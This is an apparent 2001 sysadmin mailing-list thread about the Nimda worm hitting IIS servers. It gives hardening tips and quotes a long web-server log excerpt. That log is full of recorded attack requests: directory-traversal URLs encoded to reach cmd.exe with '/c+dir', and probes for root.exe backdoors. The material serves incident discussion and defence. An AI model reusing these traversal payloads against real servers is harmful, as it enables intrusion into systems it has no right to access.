Move and ACL critical files (NT 4.0):
- Move cmd.exe, ftp.exe, finger.exe, arp.exe, ipconfig.exe, netstat.exe and tracert.exe
to a different folder.
- Remove Everyone from the ACL on these files.
- Apply an ACL on the C and D drives that only allows Everyone Read
access.
IIS 4.0:
- Remove \inetpub\iissamples and
\Program Files\Common Files\System\msadc.
It's
called W32.Nimda.A@mm -- this thing
infected all my servers.... brand new virus.
I have heard of it as well... Waiting for more
info...
~~~~~~~~~~~~~~~~~~~~~~~~~~~~ K.Borndale
----- Original Message -----
Sent: Tuesday, September 18, 2001
10:45 AM
Subject: WARNING: Hacker Alert
All my public-facing web servers at home and at my office
have shown huge, continuous hacking activity. Has anyone seen similar?
I fear this may be Code Red-related or automated. Please comment if you
have seen similar. Here is an excerpt from one
logfile:
63.101.9.107, -, 9/18/01, 10:36:21, W3SVC4, DC1DIIS01,
x.x.x.x, 0, 145, 0, 500, 87,
GET, /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe ,
/c+dir, 63.101.9.107, -, 9/18/01, 10:36:28, W3SVC4, DC1DIIS01, x.x.x.x,
0, 97, 604, 404, 3, GET, /scripts/..Á../winnt/system32/cmd.exe,
/c+dir, 63.101.9.107, -, 9/18/01, 10:36:28, W3SVC4, DC1DIIS01, x.x.x.x,
0, 97, 604, 404, 3, GET, /scripts/winnt/system32/cmd.exe,
/c+dir, 63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x,
0, 97, 604, 404, 3, GET, /winnt/system32/cmd.exe,
/c+dir, 63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x,
0, 97, 604, 404, 3, GET, /winnt/system32/cmd.exe,
/c+dir, 63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x,
0, 98, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe,
/c+dir, 63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x,
0, 96, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe,
/c+dir, 63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x,
0, 100, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe,
/c+dir, 63.101.9.107, -, 9/18/01, 10:36:33, W3SVC4, DC1DIIS01, x.x.x.x,
0, 96, 0, 500, 87, GET, /scripts/..%2f../winnt/system32/cmd.exe,
/c+dir, 64.156.252.27, -, 9/18/01, 10:36:42, W3SVC4, DC1DIIS01,
x.x.x.x, 156, 41, 13975, 200, 0, GET, /mpf-flow/flow/login.cfm,
-, 63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 0,
72, 604, 404, 3, GET, /scripts/root.exe, /c+dir, 63.101.171.231, -,
9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 0, 70, 604, 404, 3, GET,
/MSADC/root.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4,
DC1DIIS01, x.x.x.x, 0, 80, 604, 404, 3, GET, /c/winnt/system32/cmd.exe,
/c+dir, 63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01,
x.x.x.x, 15, 80, 604, 404, 3, GET, /d/winnt/system32/cmd.exe,
/c+dir, 63.101.171.231, -, 9/18/01, 10:37:06, W3SVC4, DC1DIIS01,
x.x.x.x, 0, 96, 0, 500, 87, GET,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -,
9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117, 0, 500, 87,
GET, /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe,
/c+dir, 63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01,
x.x.x.x, 0, 117, 0, 500, 87,
GET, /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe,
/c+dir, 63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01,
x.x.x.x, 0, 145, 0, 500, 87,
GET, /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe ,
/c+dir, 63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01,
x.x.x.x, 15, 97, 604, 404, 3, GET,
/scripts/..Á../winnt/system32/cmd.exe, /c+dir, 64.156.252.27, -,
9/18/01, 10:37:12, W3SVC4, DC1DIIS01, x.x.x.x, 156, 41, 13975, 200, 0,
GET, /mpf-flow/flow/login.cfm, -, 63.101.171.231, -, 9/18/01, 10:37:12,
W3SVC4, DC1DIIS01, x.x.x.x, 16, 97, 604, 404, 3, GET,
/scripts/winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01,
10:37:12, W3SVC4, DC1DIIS01, x.x.x.x, 16, 97, 604, 404, 3, GET,
/winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:13,
W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET,
/winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:13,
W3SVC4, DC1DIIS01, x.x.x.x, 0, 98, 0, 500, 87, GET,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -,
9/18/01, 10:37:13, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -,
9/18/01, 10:37:13, W3SVC4, DC1DIIS01, x.x.x.x, 0, 100, 0, 500, 87, GET,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -,
9/18/01, 10:37:17, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET,
/scripts/..%2f../winnt/system32/cmd.exe, /c+dir, 63.230.208.17, -,
9/18/01, 10:37:21, W3SVC4, DC1DIIS01, x.x.x.x, 0, 72, 604, 404, 3, GET,
/scripts/root.exe, /c+dir, 63.230.208.17, -, 9/18/01, 10:37:22, W3SVC4,
DC1DIIS01, x.x.x.x, 0, 70, 604, 404, 3, GET, /MSADC/root.exe,
/c+dir, 63.230.208.17, -, 9/18/01, 10:37:24, W3SVC4, DC1DIIS01,
x.x.x.x, 0, 80, 604, 404, 3, GET, /c/winnt/system32/cmd.exe,
/c+dir, 63.230.208.17, -, 9/18/01, 10:37:26, W3SVC4, DC1DIIS01,
x.x.x.x, 0, 80, 604, 404, 3, GET, /d/winnt/system32/cmd.exe,
/c+dir, 63.230.208.17, -, 9/18/01, 10:37:28, W3SVC4, DC1DIIS01,
x.x.x.x, 0, 96, 0, 500, 87, GET,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.230.208.17, -,
9/18/01, 10:37:34, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117, 0, 500, 87,
GET, /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe,
/c+dir, 63.230.208.17, -, 9/18/01, 10:37:36, W3SVC4, DC1DIIS01,
x.x.x.x, 0, 117, 0, 500, 87,
GET, /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe,
/c+dir, 63.230.208.17, -, 9/18/01, 10:37:42, W3SVC4, DC1DIIS01,
x.x.x.x, 0, 145, 0, 500, 87,
GET, /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe ,
/c+dir, 63.114.34.130, -, 9/18/01, 10:39:37, W3SVC4, DC1DIIS01,
x.x.x.x, 0, 72, 604, 404, 3, GET, /scripts/root.exe,
/c+dir, 63.114.34.130, -, 9/18/01, 10:39:37, W3SVC4, DC1DIIS01,
x.x.x.x, 0, 70, 604, 404, 3, GET, /MSADC/root.exe,
/c+dir, 63.114.34.130, -, 9/18/01, 10:39:37, W3SVC4, DC1DIIS01,
x.x.x.x, 0, 80, 604, 404, 3, GET, /c/winnt/system32/cmd.exe,
/c+dir, 63.114.34.130, -, 9/18/01, 10:39:38, W3SVC4, DC1DIIS01,
x.x.x.x, 0, 80, 604, 404, 3, GET, /d/winnt/system32/cmd.exe,
/c+dir, 63.114.34.130, -, 9/18/01, 10:39:38, W3SVC4, DC1DIIS01,
x.x.x.x, 0, 96, 0, 500, 87, GET,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.114.34.130, -,
9/18/01, 10:39:38, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117, 0, 500, 87,
GET, /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe,
/c+dir, 63.114.34.130, -, 9/18/01, 10:39:39, W3SVC4, DC1DIIS01,
x.x.x.x, 0, 117, 0, 500, 87,
GET, /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe,
/c+dir, 63.114.34.130, -, 9/18/01, 10:39:39, W3SVC4, DC1DIIS01,
x.x.x.x, 0, 145, 0, 500, 87,
GET, /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe ,
/c+dir, 63.114.34.130, -, 9/18/01, 10:39:39, W3SVC4, DC1DIIS01,
x.x.x.x, 15, 97, 604, 404, 3, GET,
/scripts/..Á../winnt/system32/cmd.exe, /c+dir, 63.114.34.130, -,
9/18/01, 10:39:41, W3SVC4, DC1DIIS01, x.x.x.x, 16, 97, 604, 404, 3,
GET, /scripts/winnt/system32/cmd.exe, /c+dir, 63.114.34.130, -,
9/18/01, 10:39:44, W3SVC4, DC1DIIS01, x.x.x.x, 15, 97, 604, 404, 3,
GET, /winnt/system32/cmd.exe, /c+dir, 63.114.34.130, -, 9/18/01,
10:39:44, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET,
/winnt/system32/cmd.exe, /c+dir, 63.114.34.130, -, 9/18/01, 10:39:44,
W3SVC4, DC1DIIS01, x.x.x.x, 0, 98, 0, 500, 87, GET,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 64.156.252.27, -,
9/18/01, 10:39:45, W3SVC4, DC1DIIS01, x.x.x.x, 172, 41, 13973, 200, 0,
GET, /mpf-flow/flow/login.cfm, -, 63.114.34.130, -, 9/18/01, 10:39:45,
W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.114.34.130, -,
9/18/01, 10:39:45, W3SVC4, DC1DIIS01, x.x.x.x, 0, 100, 0, 500, 87, GET,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.114.34.130, -,
9/18/01, 10:39:47, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET,
/scripts/..%2f../winnt/system32/cmd.exe, /c+dir,
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm